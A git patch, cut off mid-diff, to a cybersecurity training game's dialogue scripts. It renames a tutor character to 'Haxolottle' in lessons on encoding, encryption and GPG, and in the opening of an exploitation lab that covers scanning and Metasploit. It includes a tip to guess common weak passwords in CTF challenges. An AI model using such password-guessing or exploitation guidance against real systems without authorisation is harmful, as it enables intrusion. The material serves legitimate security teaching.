From 3ccfe9d99aeecad8766bd530dc63a596eb3aadf8 Mon Sep 17 00:00:00 2001 From: "Z. Cliffe Schreuders" Date: Wed, 19 Nov 2025 18:24:26 +0000 Subject: [PATCH] feat: Update remaining game scenario files to Haxolottle dialogue - exploitation.ink - post_exploitation.ink - phishing_social_engineering.ink - encoding_encryption.ink - feeling_blu_ctf.ink All files now use consistent Haxolottle character and conversational tone --- .../game_scenarios/encoding_encryption.ink | 308 +++---- .../ink/game_scenarios/exploitation.ink | 120 +-- .../ink/game_scenarios/feeling_blu_ctf.ink | 398 ++++----- .../phishing_social_engineering.ink | 110 +-- .../ink/game_scenarios/post_exploitation.ink | 764 +++++++++--------- 5 files changed, 850 insertions(+), 850 deletions(-) diff --git a/story_design/ink/game_scenarios/encoding_encryption.ink b/story_design/ink/game_scenarios/encoding_encryption.ink index 2e8fb95..9c1ae73 100644 --- a/story_design/ink/game_scenarios/encoding_encryption.ink +++ b/story_design/ink/game_scenarios/encoding_encryption.ink @@ -7,7 +7,7 @@ // =========================================== // Global persistent state -VAR instructor_rapport = 0 +VAR haxolottle_rapport = 0 // External variables EXTERNAL player_name @@ -17,13 +17,13 @@ EXTERNAL player_name // =========================================== === start === -Crypto Instructor: Welcome to Cryptography Fundamentals, Agent {player_name}. +Haxolottle: Welcome to Cryptography Fundamentals, Agent {player_name}. -Crypto Instructor: Today we're covering encoding and encryption - two concepts that sound similar but serve very different purposes. +Haxolottle: Today we're covering encoding and encryption - two concepts that sound similar but serve very different purposes. -Crypto Instructor: You'll learn about encoding schemes like Base64 and hexadecimal, symmetric encryption with AES and DES, and asymmetric cryptography with GPG. +Haxolottle: You'll learn about encoding schemes like Base64 and hexadecimal, symmetric encryption with AES and DES, and asymmetric cryptography with GPG. -Crypto Instructor: These skills are essential for any security professional. Let's begin. +Haxolottle: These skills are essential for any security professional. Let's begin. -> crypto_hub @@ -32,7 +32,7 @@ Crypto Instructor: These skills are essential for any security professional. Let // =========================================== === crypto_hub === -Crypto Instructor: What would you like to explore? +Haxolottle: What would you like to explore? + [Encoding vs Encryption - what's the difference?] -> encoding_vs_encryption @@ -61,26 +61,26 @@ Crypto Instructor: What would you like to explore? // =========================================== === encoding_vs_encryption === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Crypto Instructor: Excellent starting point. These terms get confused constantly. +Haxolottle: Excellent starting point. These terms get confused constantly. -Crypto Instructor: **Encoding** transforms data into a different format using a publicly known, reversible scheme. Anyone can decode it - no secret required. +Haxolottle: **Encoding** transforms data into a different format using a publicly known, reversible scheme. Anyone can decode it - no secret required. -Crypto Instructor: **Encryption** transforms data into a format readable only with a key or password. Without the key, the data is protected. +Haxolottle: **Encryption** transforms data into a format readable only with a key or password. Without the key, the data is protected. -Crypto Instructor: Think of it this way: encoding is like translating a book to a different language. Anyone with the right dictionary can read it. Encryption is like using a secret cipher - only those with the key can decode it. +Haxolottle: Think of it this way: encoding is like translating a book to a different language. Anyone with the right dictionary can read it. Encryption is like using a secret cipher - only those with the key can decode it. * [Why use encoding if it's not secure?] - ~ instructor_rapport += 8 + ~ haxolottle_rapport += 8 You: If encoding doesn't provide security, why use it? - Crypto Instructor: Compatibility and efficiency. Base64, for instance, lets you safely transmit binary data over text-only protocols like email. Hexadecimal makes binary data human-readable for debugging. - Crypto Instructor: Encoding solves technical problems. Encryption solves security problems. Different tools for different jobs. + Haxolottle: Compatibility and efficiency. Base64, for instance, lets you safely transmit binary data over text-only protocols like email. Hexadecimal makes binary data human-readable for debugging. + Haxolottle: Encoding solves technical problems. Encryption solves security problems. Different tools for different jobs. * [Can you give examples of each?] You: What are common examples of encoding and encryption? - Crypto Instructor: Encoding: Base64, hexadecimal, ASCII, URL encoding. Used for data representation. - Crypto Instructor: Encryption: AES, RSA, DES. Used for data protection. - Crypto Instructor: If you find Base64 data, don't assume it's encrypted - it's just encoded. Trivial to reverse. + Haxolottle: Encoding: Base64, hexadecimal, ASCII, URL encoding. Used for data representation. + Haxolottle: Encryption: AES, RSA, DES. Used for data protection. + Haxolottle: If you find Base64 data, don't assume it's encrypted - it's just encoded. Trivial to reverse. * [Got it] You: Clear distinction. - -> crypto_hub @@ -90,34 +90,34 @@ Crypto Instructor: Think of it this way: encoding is like translating a book to // =========================================== === character_encoding === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Crypto Instructor: Let's start with the basics - how computers represent text. +Haxolottle: Let's start with the basics - how computers represent text. -Crypto Instructor: ASCII - American Standard Code for Information Interchange. Maps characters to numbers. For example, "hello!" is: +Haxolottle: ASCII - American Standard Code for Information Interchange. Maps characters to numbers. For example, "hello!" is: - Decimal: 104 101 108 108 111 33 - Hex: 68 65 6c 6c 6f 21 - Binary: 01101000 01100101 01101100 01101100 01101111 00100001 -Crypto Instructor: All the same data, just different representations. +Haxolottle: All the same data, just different representations. * [Why multiple representations?] - ~ instructor_rapport += 8 + ~ haxolottle_rapport += 8 You: Why do we need so many ways to represent the same thing? - Crypto Instructor: Context. Humans read decimal. Computers process binary. Hex is compact for humans to read binary - two hex digits per byte. - Crypto Instructor: Choose the representation that fits your needs. Debugging network traffic? Hex. Mathematical operations? Decimal. Actual processing? Binary. + Haxolottle: Context. Humans read decimal. Computers process binary. Hex is compact for humans to read binary - two hex digits per byte. + Haxolottle: Choose the representation that fits your needs. Debugging network traffic? Hex. Mathematical operations? Decimal. Actual processing? Binary. * [Tell me about Unicode] You: How does Unicode fit in? - Crypto Instructor: ASCII is 7-bit, covers English characters. Unicode extends this to support every language, emoji, symbols. - Crypto Instructor: UTF-8 is the dominant Unicode encoding - backward-compatible with ASCII, supports international characters efficiently. - Crypto Instructor: Most modern systems use UTF-8 by default. + Haxolottle: ASCII is 7-bit, covers English characters. Unicode extends this to support every language, emoji, symbols. + Haxolottle: UTF-8 is the dominant Unicode encoding - backward-compatible with ASCII, supports international characters efficiently. + Haxolottle: Most modern systems use UTF-8 by default. * [Show me practical commands] You: What commands convert between these formats? - Crypto Instructor: `xxd` is your friend. Try: + Haxolottle: `xxd` is your friend. Try: - `echo hello! | xxd` for hex output - `echo hello! | xxd -b` for binary - `echo 68656c6c6f21 | xxd -r -p` to convert hex back to text - Crypto Instructor: Python's also excellent: `"hello!".encode().hex()` gets you hex. + Haxolottle: Python's also excellent: `"hello!".encode().hex()` gets you hex. - -> crypto_hub // =========================================== @@ -125,31 +125,31 @@ Crypto Instructor: All the same data, just different representations. // =========================================== === hex_and_base64 === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Crypto Instructor: Two encoding schemes you'll encounter constantly: hexadecimal and Base64. +Haxolottle: Two encoding schemes you'll encounter constantly: hexadecimal and Base64. -Crypto Instructor: **Hexadecimal**: Base-16. Uses 0-9 and a-f. Two hex characters per byte. Compact, human-readable representation of binary data. +Haxolottle: **Hexadecimal**: Base-16. Uses 0-9 and a-f. Two hex characters per byte. Compact, human-readable representation of binary data. -Crypto Instructor: **Base64**: Uses A-Z, a-z, 0-9, +, /, and = for padding. More efficient than hex for transmitting binary data. Four characters represent three bytes. +Haxolottle: **Base64**: Uses A-Z, a-z, 0-9, +, /, and = for padding. More efficient than hex for transmitting binary data. Four characters represent three bytes. * [When do I use Base64 vs hex?] - ~ instructor_rapport += 10 + ~ haxolottle_rapport += 10 You: How do I choose between Base64 and hex? - Crypto Instructor: Base64 when efficiency matters - 33% overhead vs 100% for hex. Common in web protocols, email attachments, JSON/XML with binary data. - Crypto Instructor: Hex when human readability and debugging matter. Easier to spot patterns, map directly to bytes. - Crypto Instructor: In CTFs and forensics? You'll see both constantly. Learn to recognize them on sight. + Haxolottle: Base64 when efficiency matters - 33% overhead vs 100% for hex. Common in web protocols, email attachments, JSON/XML with binary data. + Haxolottle: Hex when human readability and debugging matter. Easier to spot patterns, map directly to bytes. + Haxolottle: In CTFs and forensics? You'll see both constantly. Learn to recognize them on sight. * [Show me Base64 commands] You: Walk me through Base64 encoding. - Crypto Instructor: Simple: `echo "text" | base64` encodes. `echo "encoded" | base64 -d` decodes. - Crypto Instructor: Try this chain: `echo "Valhalla" | base64 | xxd -p | xxd -r -p | base64 -d` - Crypto Instructor: You're encoding to Base64, converting to hex, converting back, decoding Base64. Should get "Valhalla" back. Demonstrates reversibility. + Haxolottle: Simple: `echo "text" | base64` encodes. `echo "encoded" | base64 -d` decodes. + Haxolottle: Try this chain: `echo "Valhalla" | base64 | xxd -p | xxd -r -p | base64 -d` + Haxolottle: You're encoding to Base64, converting to hex, converting back, decoding Base64. Should get "Valhalla" back. Demonstrates reversibility. * [How do I recognize Base64?] You: How can I identify Base64 when I see it? - Crypto Instructor: Look for: alphanumeric characters, sometimes with + and /, often ending in = or ==. - Crypto Instructor: Length is always multiple of 4 (due to padding). - Crypto Instructor: Classic tell: mix of uppercase, lowercase, and numbers, ending in equals signs. - Crypto Instructor: Example: `VmFsaGFsbGEK` - that's Base64. + Haxolottle: Look for: alphanumeric characters, sometimes with + and /, often ending in = or ==. + Haxolottle: Length is always multiple of 4 (due to padding). + Haxolottle: Classic tell: mix of uppercase, lowercase, and numbers, ending in equals signs. + Haxolottle: Example: `VmFsaGFsbGEK` - that's Base64. - -> crypto_hub // =========================================== @@ -157,11 +157,11 @@ Crypto Instructor: **Base64**: Uses A-Z, a-z, 0-9, +, /, and = for padding. More // =========================================== === symmetric_encryption === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Crypto Instructor: Symmetric encryption - the same key encrypts and decrypts. Fast, efficient, but has a key distribution problem. +Haxolottle: Symmetric encryption - the same key encrypts and decrypts. Fast, efficient, but has a key distribution problem. -Crypto Instructor: Two main algorithms you'll use: DES and AES. +Haxolottle: Two main algorithms you'll use: DES and AES. * [Tell me about DES] You: What's DES? @@ -170,68 +170,68 @@ Crypto Instructor: Two main algorithms you'll use: DES and AES. You: What's AES? -> aes_explanation * [What's the key distribution problem?] - ~ instructor_rapport += 10 + ~ haxolottle_rapport += 10 You: You mentioned a key distribution problem? - Crypto Instructor: The fundamental challenge of symmetric crypto: how do you securely share the key? - Crypto Instructor: If you encrypt a message with AES, your recipient needs the same key to decrypt. How do you get them the key without an attacker intercepting it? - Crypto Instructor: This is where public key crypto comes in - or secure key exchange protocols like Diffie-Hellman. + Haxolottle: The fundamental challenge of symmetric crypto: how do you securely share the key? + Haxolottle: If you encrypt a message with AES, your recipient needs the same key to decrypt. How do you get them the key without an attacker intercepting it? + Haxolottle: This is where public key crypto comes in - or secure key exchange protocols like Diffie-Hellman. -> symmetric_encryption * [Back to main menu] -> crypto_hub === des_explanation === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Crypto Instructor: DES - Data Encryption Standard. Developed by IBM in the 1970s, based on Feistel ciphers. +Haxolottle: DES - Data Encryption Standard. Developed by IBM in the 1970s, based on Feistel ciphers. -Crypto Instructor: 56-bit key size. Small by modern standards - brute-forceable in reasonable time with modern hardware. +Haxolottle: 56-bit key size. Small by modern standards - brute-forceable in reasonable time with modern hardware. -Crypto Instructor: Historical importance, but don't use it for real security anymore. Superseded by AES. +Haxolottle: Historical importance, but don't use it for real security anymore. Superseded by AES. -Crypto Instructor: OpenSSL command: `openssl enc -des-cbc -pbkdf2 -in file.txt -out file.enc` +Haxolottle: OpenSSL command: `openssl enc -des-cbc -pbkdf2 -in file.txt -out file.enc` * [Why is 56-bit insufficient?] - ~ instructor_rapport += 8 + ~ haxolottle_rapport += 8 You: Why is 56 bits too small? - Crypto Instructor: 2^56 possible keys - about 72 quadrillion. Sounds large, but modern systems can test millions or billions of keys per second. - Crypto Instructor: DES was cracked in less than 24 hours in 1999. Hardware has only improved since then. - Crypto Instructor: Compare to AES-256: 2^256 keys. Astronomically larger. Not brute-forceable with current or foreseeable technology. + Haxolottle: 2^56 possible keys - about 72 quadrillion. Sounds large, but modern systems can test millions or billions of keys per second. + Haxolottle: DES was cracked in less than 24 hours in 1999. Hardware has only improved since then. + Haxolottle: Compare to AES-256: 2^256 keys. Astronomically larger. Not brute-forceable with current or foreseeable technology. * [Show me the decryption command] You: How do I decrypt DES-encrypted data? - Crypto Instructor: `openssl enc -des-cbc -d -in file.enc -out decrypted.txt` - Crypto Instructor: The `-d` flag specifies decryption. You'll be prompted for the password. - Crypto Instructor: Note: password and key aren't quite the same. The password is hashed with PBKDF2 to derive the actual encryption key. + Haxolottle: `openssl enc -des-cbc -d -in file.enc -out decrypted.txt` + Haxolottle: The `-d` flag specifies decryption. You'll be prompted for the password. + Haxolottle: Note: password and key aren't quite the same. The password is hashed with PBKDF2 to derive the actual encryption key. - -> symmetric_encryption === aes_explanation === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Crypto Instructor: AES - Advanced Encryption Standard. The modern symmetric encryption standard. +Haxolottle: AES - Advanced Encryption Standard. The modern symmetric encryption standard. -Crypto Instructor: 128-bit block cipher. Key sizes: 128, 192, or 256 bits. Uses substitution-permutation network - combination of substitution, permutation, mixing, and key addition. +Haxolottle: 128-bit block cipher. Key sizes: 128, 192, or 256 bits. Uses substitution-permutation network - combination of substitution, permutation, mixing, and key addition. -Crypto Instructor: Fast, secure, widely supported. This is what you should be using for symmetric encryption. +Haxolottle: Fast, secure, widely supported. This is what you should be using for symmetric encryption. * [How much stronger is AES than DES?] - ~ instructor_rapport += 10 + ~ haxolottle_rapport += 10 You: Quantify the security improvement over DES. - Crypto Instructor: DES: 2^56 keyspace. AES-128: 2^128. AES-256: 2^256. - Crypto Instructor: AES-128 has 2^72 times more keys than DES. AES-256 has 2^200 times more keys than AES-128. - Crypto Instructor: To put it in perspective: if you could test a trillion trillion keys per second, AES-256 would still take longer than the age of the universe to brute force. - Crypto Instructor: Practical attacks on AES focus on implementation flaws, side channels, or compromising the key - not brute forcing. + Haxolottle: DES: 2^56 keyspace. AES-128: 2^128. AES-256: 2^256. + Haxolottle: AES-128 has 2^72 times more keys than DES. AES-256 has 2^200 times more keys than AES-128. + Haxolottle: To put it in perspective: if you could test a trillion trillion keys per second, AES-256 would still take longer than the age of the universe to brute force. + Haxolottle: Practical attacks on AES focus on implementation flaws, side channels, or compromising the key - not brute forcing. * [Show me AES commands] You: Walk me through AES encryption. - Crypto Instructor: Encrypt: `openssl enc -aes-256-cbc -pbkdf2 -in file.txt -out file.enc` - Crypto Instructor: Decrypt: `openssl enc -aes-256-cbc -d -in file.enc -out file.txt` - Crypto Instructor: You can use -aes-128-cbc, -aes-192-cbc, or -aes-256-cbc depending on key size. - Crypto Instructor: CBC mode is Cipher Block Chaining. ECB mode also available but has security weaknesses - avoid for real use. + Haxolottle: Encrypt: `openssl enc -aes-256-cbc -pbkdf2 -in file.txt -out file.enc` + Haxolottle: Decrypt: `openssl enc -aes-256-cbc -d -in file.enc -out file.txt` + Haxolottle: You can use -aes-128-cbc, -aes-192-cbc, or -aes-256-cbc depending on key size. + Haxolottle: CBC mode is Cipher Block Chaining. ECB mode also available but has security weaknesses - avoid for real use. * [What's CBC mode?] - ~ instructor_rapport += 8 + ~ haxolottle_rapport += 8 You: Explain CBC mode. - Crypto Instructor: Cipher Block Chaining. Each block of plaintext is XORed with the previous ciphertext block before encryption. - Crypto Instructor: This means identical plaintext blocks produce different ciphertext - hides patterns. - Crypto Instructor: ECB (Electronic Codebook) encrypts each block independently - same input always produces same output. Leaks pattern information. - Crypto Instructor: Always use CBC or more modern modes like GCM. Never use ECB for real data. + Haxolottle: Cipher Block Chaining. Each block of plaintext is XORed with the previous ciphertext block before encryption. + Haxolottle: This means identical plaintext blocks produce different ciphertext - hides patterns. + Haxolottle: ECB (Electronic Codebook) encrypts each block independently - same input always produces same output. Leaks pattern information. + Haxolottle: Always use CBC or more modern modes like GCM. Never use ECB for real data. - -> symmetric_encryption // =========================================== @@ -239,34 +239,34 @@ Crypto Instructor: Fast, secure, widely supported. This is what you should be us // =========================================== === public_key_crypto === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Crypto Instructor: Asymmetric cryptography. Revolutionary concept - separate keys for encryption and decryption. +Haxolottle: Asymmetric cryptography. Revolutionary concept - separate keys for encryption and decryption. -Crypto Instructor: **Public key**: shared freely. Anyone can use it to encrypt messages to you. +Haxolottle: **Public key**: shared freely. Anyone can use it to encrypt messages to you. **Private key**: kept secret. Only you can decrypt messages encrypted with your public key. -Crypto Instructor: Solves the key distribution problem. You can publish your public key openly - doesn't compromise security. +Haxolottle: Solves the key distribution problem. You can publish your public key openly - doesn't compromise security. * [How does this actually work?] - ~ instructor_rapport += 10 + ~ haxolottle_rapport += 10 You: What's the underlying mechanism? - Crypto Instructor: Mathematics - specifically, functions that are easy to compute in one direction but extremely hard to reverse without special information. - Crypto Instructor: RSA uses factoring large prime numbers. Easy to multiply two huge primes, nearly impossible to factor the result back without knowing the primes. - Crypto Instructor: Your private key contains the primes. Your public key contains their product. Encryption uses the product, decryption needs the primes. - Crypto Instructor: Full math is beyond this course, but that's the essence. One-way mathematical trap doors. + Haxolottle: Mathematics - specifically, functions that are easy to compute in one direction but extremely hard to reverse without special information. + Haxolottle: RSA uses factoring large prime numbers. Easy to multiply two huge primes, nearly impossible to factor the result back without knowing the primes. + Haxolottle: Your private key contains the primes. Your public key contains their product. Encryption uses the product, decryption needs the primes. + Haxolottle: Full math is beyond this course, but that's the essence. One-way mathematical trap doors. * [What's the downside?] - ~ instructor_rapport += 8 + ~ haxolottle_rapport += 8 You: This sounds perfect. What's the catch? - Crypto Instructor: Performance. Asymmetric crypto is much slower than symmetric. - Crypto Instructor: Typical use: asymmetric crypto to exchange a symmetric key, then symmetric crypto for actual data. - Crypto Instructor: TLS/SSL does exactly this - RSA or ECDH to agree on a session key, then AES to encrypt the connection. - Crypto Instructor: Hybrid approach gets security of asymmetric with performance of symmetric. + Haxolottle: Performance. Asymmetric crypto is much slower than symmetric. + Haxolottle: Typical use: asymmetric crypto to exchange a symmetric key, then symmetric crypto for actual data. + Haxolottle: TLS/SSL does exactly this - RSA or ECDH to agree on a session key, then AES to encrypt the connection. + Haxolottle: Hybrid approach gets security of asymmetric with performance of symmetric. * [Tell me about GPG] You: How does GPG fit into this? - Crypto Instructor: GPG - GNU Privacy Guard. Open source implementation of PGP (Pretty Good Privacy). - Crypto Instructor: Provides public-key crypto for email encryption, file encryption, digital signatures. - Crypto Instructor: Industry standard for email security and file protection. + Haxolottle: GPG - GNU Privacy Guard. Open source implementation of PGP (Pretty Good Privacy). + Haxolottle: Provides public-key crypto for email encryption, file encryption, digital signatures. + Haxolottle: Industry standard for email security and file protection. -> gpg_intro - -> crypto_hub @@ -275,35 +275,35 @@ Crypto Instructor: Solves the key distribution problem. You can publish your pub // =========================================== === openssl_tools === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Crypto Instructor: OpenSSL - the Swiss Army knife of cryptography. +Haxolottle: OpenSSL - the Swiss Army knife of cryptography. -Crypto Instructor: It's a toolkit implementing SSL/TLS protocols and providing cryptographic functions. Command-line tool plus libraries. +Haxolottle: It's a toolkit implementing SSL/TLS protocols and providing cryptographic functions. Command-line tool plus libraries. -Crypto Instructor: Can do: key generation, encryption, decryption, hashing, certificate management, SSL/TLS testing, and much more. +Haxolottle: Can do: key generation, encryption, decryption, hashing, certificate management, SSL/TLS testing, and much more. * [Show me useful commands] You: What are the most useful OpenSSL commands? - Crypto Instructor: List available ciphers: `openssl list -cipher-algorithms` - Crypto Instructor: Generate hash: `echo "data" | openssl dgst -sha256` - Crypto Instructor: Encrypt file: `openssl enc -aes-256-cbc -in file -out file.enc` - Crypto Instructor: Check certificate: `openssl x509 -in cert.pem -text -noout` - Crypto Instructor: Test SSL connection: `openssl s_client -connect example.com:443` - Crypto Instructor: Generate random bytes: `openssl rand -hex 32` + Haxolottle: List available ciphers: `openssl list -cipher-algorithms` + Haxolottle: Generate hash: `echo "data" | openssl dgst -sha256` + Haxolottle: Encrypt file: `openssl enc -aes-256-cbc -in file -out file.enc` + Haxolottle: Check certificate: `openssl x509 -in cert.pem -text -noout` + Haxolottle: Test SSL connection: `openssl s_client -connect example.com:443` + Haxolottle: Generate random bytes: `openssl rand -hex 32` * [Tell me about the 2014 vulnerability] - ~ instructor_rapport += 15 + ~ haxolottle_rapport += 15 You: You mentioned a major OpenSSL vulnerability in 2014? - Crypto Instructor: Heartbleed. CVE-2014-0160. One of the most significant security flaws in internet history. - Crypto Instructor: Bug in OpenSSL's implementation of TLS heartbeat extension. Allowed attackers to read server memory - including private keys, passwords, session tokens. - Crypto Instructor: Affected two-thirds of web servers. Required widespread patching and certificate replacement. - Crypto Instructor: Important lesson: even cryptographic implementations can have bugs. The algorithms (AES, RSA) were fine - the implementation was flawed. - Crypto Instructor: This is why: keep software updated, use well-audited libraries, implement defense in depth. + Haxolottle: Heartbleed. CVE-2014-0160. One of the most significant security flaws in internet history. + Haxolottle: Bug in OpenSSL's implementation of TLS heartbeat extension. Allowed attackers to read server memory - including private keys, passwords, session tokens. + Haxolottle: Affected two-thirds of web servers. Required widespread patching and certificate replacement. + Haxolottle: Important lesson: even cryptographic implementations can have bugs. The algorithms (AES, RSA) were fine - the implementation was flawed. + Haxolottle: This is why: keep software updated, use well-audited libraries, implement defense in depth. * [How do I check OpenSSL version?] You: How do I know what version I'm running? - Crypto Instructor: `openssl version -a` shows version and build details. - Crypto Instructor: Post-Heartbleed, you want OpenSSL 1.0.1g or later, or 1.0.2 series. - Crypto Instructor: Most modern systems use OpenSSL 1.1.1 or 3.x now. + Haxolottle: `openssl version -a` shows version and build details. + Haxolottle: Post-Heartbleed, you want OpenSSL 1.0.1g or later, or 1.0.2 series. + Haxolottle: Most modern systems use OpenSSL 1.1.1 or 3.x now. - -> crypto_hub // =========================================== @@ -311,37 +311,37 @@ Crypto Instructor: Can do: key generation, encryption, decryption, hashing, cert // =========================================== === gpg_intro === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Crypto Instructor: GPG - GNU Privacy Guard. Open-source public-key cryptography and signing tool. +Haxolottle: GPG - GNU Privacy Guard. Open-source public-key cryptography and signing tool. -Crypto Instructor: Core concepts: key pairs (public and private), encryption, decryption, signing, verification. +Haxolottle: Core concepts: key pairs (public and private), encryption, decryption, signing, verification. * [Walk me through key generation] You: How do I create GPG keys? - Crypto Instructor: `gpg --gen-key` starts the process. You'll provide name, email, passphrase. - Crypto Instructor: This creates a key pair. Public key you share, private key you protect. - Crypto Instructor: The passphrase protects your private key - don't forget it! Without it, your private key is useless. + Haxolottle: `gpg --gen-key` starts the process. You'll provide name, email, passphrase. + Haxolottle: This creates a key pair. Public key you share, private key you protect. + Haxolottle: The passphrase protects your private key - don't forget it! Without it, your private key is useless. * [How do I share my public key?] You: How do others get my public key? - Crypto Instructor: Export it: `gpg --export -a "Your Name" > public.key` - Crypto Instructor: This creates ASCII-armored public key file. Share it via email, website, key server. - Crypto Instructor: Recipients import it: `gpg --import public.key` - Crypto Instructor: Now they can encrypt messages only you can read. + Haxolottle: Export it: `gpg --export -a "Your Name" > public.key` + Haxolottle: This creates ASCII-armored public key file. Share it via email, website, key server. + Haxolottle: Recipients import it: `gpg --import public.key` + Haxolottle: Now they can encrypt messages only you can read. * [Encrypting and decrypting] You: Show me the encryption workflow. - Crypto Instructor: Encrypt: `gpg -e -r "Recipient Name" file.txt` creates file.txt.gpg - Crypto Instructor: Decrypt: `gpg -d file.txt.gpg > decrypted.txt` - Crypto Instructor: Recipient's public key must be in your keyring to encrypt for them. - Crypto Instructor: Your private key must be available to decrypt messages to you. + Haxolottle: Encrypt: `gpg -e -r "Recipient Name" file.txt` creates file.txt.gpg + Haxolottle: Decrypt: `gpg -d file.txt.gpg > decrypted.txt` + Haxolottle: Recipient's public key must be in your keyring to encrypt for them. + Haxolottle: Your private key must be available to decrypt messages to you. * [What about digital signatures?] - ~ instructor_rapport += 10 + ~ haxolottle_rapport += 10 You: How do signatures work? - Crypto Instructor: Signatures prove a message came from you and wasn't modified. - Crypto Instructor: Sign: `gpg -s file.txt` - creates file.txt.gpg with signature - Crypto Instructor: Verify: `gpg --verify file.txt.gpg` - confirms signature and shows signer - Crypto Instructor: Uses your private key to sign, others use your public key to verify. Reverse of encryption. - Crypto Instructor: Provides authenticity and integrity - critical for software distribution, secure communications. + Haxolottle: Signatures prove a message came from you and wasn't modified. + Haxolottle: Sign: `gpg -s file.txt` - creates file.txt.gpg with signature + Haxolottle: Verify: `gpg --verify file.txt.gpg` - confirms signature and shows signer + Haxolottle: Uses your private key to sign, others use your public key to verify. Reverse of encryption. + Haxolottle: Provides authenticity and integrity - critical for software distribution, secure communications. - -> crypto_hub // =========================================== @@ -349,20 +349,20 @@ Crypto Instructor: Core concepts: key pairs (public and private), encryption, de // =========================================== === commands_reference === -Crypto Instructor: Quick reference for the commands we've covered: +Haxolottle: Quick reference for the commands we've covered: -Crypto Instructor: **Encoding:** +Haxolottle: **Encoding:** - Hex: `echo "text" | xxd -p` (encode), `echo "hex" | xxd -r -p` (decode) - Base64: `echo "text" | base64` (encode), `echo "b64" | base64 -d` (decode) - View as binary: `xxd -b file` -Crypto Instructor: **Symmetric Encryption (OpenSSL):** +Haxolottle: **Symmetric Encryption (OpenSSL):** - AES encrypt: `openssl enc -aes-256-cbc -pbkdf2 -in file -out file.enc` - AES decrypt: `openssl enc -aes-256-cbc -d -in file.enc -out file.txt` - DES encrypt: `openssl enc -des-cbc -pbkdf2 -in file -out file.enc` - List ciphers: `openssl list -cipher-algorithms` -Crypto Instructor: **Public Key Crypto (GPG):** +Haxolottle: **Public Key Crypto (GPG):** - Generate keys: `gpg --gen-key` - List keys: `gpg --list-keys` - Export public: `gpg --export -a "Name" > public.key` @@ -372,7 +372,7 @@ Crypto Instructor: **Public Key Crypto (GPG):** - Sign: `gpg -s file` - Verify: `gpg --verify file.gpg` -Crypto Instructor: **Useful OpenSSL:** +Haxolottle: **Useful OpenSSL:** - Hash: `openssl dgst -sha256 file` - Random data: `openssl rand -hex 32` - Version: `openssl version` @@ -385,33 +385,33 @@ Crypto Instructor: **Useful OpenSSL:** // =========================================== === ready_for_practice === -Crypto Instructor: Excellent. You've covered the fundamentals. +Haxolottle: Excellent. You've covered the fundamentals. -Crypto Instructor: In your VM's home directory, you'll find CTF challenges testing these skills: +Haxolottle: In your VM's home directory, you'll find CTF challenges testing these skills: - Decoding various encoded data - Decrypting symmetrically-encrypted files - Using GPG for secure communication - Breaking weak encryption -Crypto Instructor: Practical tips: +Haxolottle: Practical tips: -Crypto Instructor: **Recognize encoding schemes on sight**: Base64 ends in =, hex is 0-9 and a-f, binary is only 0 and 1. +Haxolottle: **Recognize encoding schemes on sight**: Base64 ends in =, hex is 0-9 and a-f, binary is only 0 and 1. -Crypto Instructor: **Try obvious passwords first**: "password", "admin", "123456". Weak keys are common. +Haxolottle: **Try obvious passwords first**: "password", "admin", "123456". Weak keys are common. -Crypto Instructor: **Check file headers**: `file` command identifies file types even if extension is wrong. Encoded/encrypted data looks like random bytes. +Haxolottle: **Check file headers**: `file` command identifies file types even if extension is wrong. Encoded/encrypted data looks like random bytes. -Crypto Instructor: **Use CyberChef for quick analysis**: Web tool that chains encoding/decoding operations. Great for CTFs. +Haxolottle: **Use CyberChef for quick analysis**: Web tool that chains encoding/decoding operations. Great for CTFs. -Crypto Instructor: **Document what you try**: When attempting decryption, track what keys/methods you've tested. Easy to lose track. +Haxolottle: **Document what you try**: When attempting decryption, track what keys/methods you've tested. Easy to lose track. -{instructor_rapport >= 50: - Crypto Instructor: You've asked excellent questions and engaged deeply with the material. You're well-prepared. +{haxolottle_rapport >= 50: + Haxolottle: You've asked excellent questions and engaged deeply with the material. You're well-prepared. } -Crypto Instructor: Remember: encoding is reversible with no secret. Encryption requires keys. Symmetric uses same key for both. Asymmetric uses key pairs. +Haxolottle: Remember: encoding is reversible with no secret. Encryption requires keys. Symmetric uses same key for both. Asymmetric uses key pairs. -Crypto Instructor: Now go break some crypto challenges. Good luck, Agent {player_name}. +Haxolottle: Now go break some crypto challenges. Good luck, Agent {player_name}. #exit_conversation -> END diff --git a/story_design/ink/game_scenarios/exploitation.ink b/story_design/ink/game_scenarios/exploitation.ink index cf5056a..97de033 100644 --- a/story_design/ink/game_scenarios/exploitation.ink +++ b/story_design/ink/game_scenarios/exploitation.ink @@ -4,7 +4,7 @@ // License: CC BY-SA 4.0 // Global persistent state -VAR instructor_rapport = 0 +VAR haxolottle_rapport = 0 VAR exploitation_mastery = 0 // External variables @@ -13,7 +13,7 @@ EXTERNAL player_name === start === Exploitation Specialist: Welcome back, Agent {player_name}. I'm your instructor for Advanced Exploitation Techniques. -~ instructor_rapport = 0 +~ haxolottle_rapport = 0 ~ exploitation_mastery = 0 Exploitation Specialist: This lab brings together everything you've learned so far - scanning, vulnerability research, and exploitation. @@ -64,7 +64,7 @@ Exploitation Specialist: What aspect of exploitation would you like to explore? === scanning_to_exploitation === Exploitation Specialist: After gathering information about a target through footprinting and scanning, you need to know what attacks will work. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Exploitation Specialist: The key questions are: Where will you find vulnerability information? How will you use that information to launch an attack? How can security professionals use this to test system security? @@ -77,7 +77,7 @@ Exploitation Specialist: Once you know the operating system and software running Exploitation Specialist: The scanning phase reveals what's running. The vulnerability research phase identifies what's vulnerable. The exploitation phase is when you actually attack. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I know what attacks will work?] Exploitation Specialist: This is where vulnerability databases and exploit frameworks like Metasploit come in. @@ -88,14 +88,14 @@ Exploitation Specialist: Once you know the operating system and software running Exploitation Specialist: We'll also look at external databases like CVE Details, NVD, and Exploit DB. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> exploitation_hub === nmap_scanning === Exploitation Specialist: The first step is thorough scanning to identify your targets and what they're running. -~ instructor_rapport += 5 +~ 